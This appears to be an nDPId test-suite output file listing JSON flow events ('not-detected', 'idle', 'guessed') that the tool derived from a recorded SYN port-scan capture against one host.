+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2121,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2121,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2126,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":79,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":79,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2126,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":79,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":79,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1278275056403,"flow_last_seen":1278275077676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1278275056403,"flow_last_seen":1278275077676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":81,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":81,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":81,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":81,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":82,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":82,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":83,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":83,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":82,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":82,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":799,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":84,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":799,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":84,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":83,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":83,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1824,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":85,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1824,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":85,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":856,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":84,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":856,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":84,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1907,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":85,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1907,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":85,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2135,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2135,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00703{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00703{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1040,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":89,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1040,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":89,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1895,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":90,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1895,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":90,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":89,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":89,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 